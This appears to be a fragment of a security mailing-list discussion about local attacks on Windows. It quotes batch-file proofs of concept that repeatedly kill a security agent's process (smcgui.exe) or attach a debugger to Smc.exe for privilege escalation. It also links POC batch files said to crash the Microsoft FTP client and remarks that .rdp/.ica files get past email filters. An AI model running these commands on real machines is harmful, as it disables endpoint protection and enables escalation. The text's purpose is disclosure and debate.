Privilege Escalation attack
POC:
::Save the following as a batch file and execute it.
:here
taskkill /im smcgui.exe /f
goto :here
Now, since smcgui.exe is running in the user account, it will not be
>> drwtsn32 -p %pid%
>> where pid is the process id for smc.exe
>>
>> POC:
>>
>> Save the following as a batch file and execute it
>>
>> tasklist | find /i "Smc.exe" > c:\pid.txt
>> FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
>> drwtsn32 -p %pidopt%
>>
RS> Demonstration:
RS> Note: Demonstration leads to crashing of Microsoft FTP
RS> Client
RS> Download the POC, rename it to a .bat file and execute any one of
RS> the batch files
RS> http://www.xdisclose.com/poc/mget.bat.txt
RS> http://www.xdisclose.com/poc/username.bat.txt
RS> http://www.xdisclose.com/poc/directory.bat.txt
RS> http://www.xdisclose.com/poc/list.bat.txt
Steve,
try to email someone from your company a batch file. I am sure that
will fail, mainly because you realize that it is a security risk.
Right? Now try to email a .rdp or .ica file. It works 99% of the
time.
Second, please read the article. :) No offense, but you are completely
missing the point here. Third, users do not need to have admin rights;
these rights can be obtained with a privilege escalation exercise. this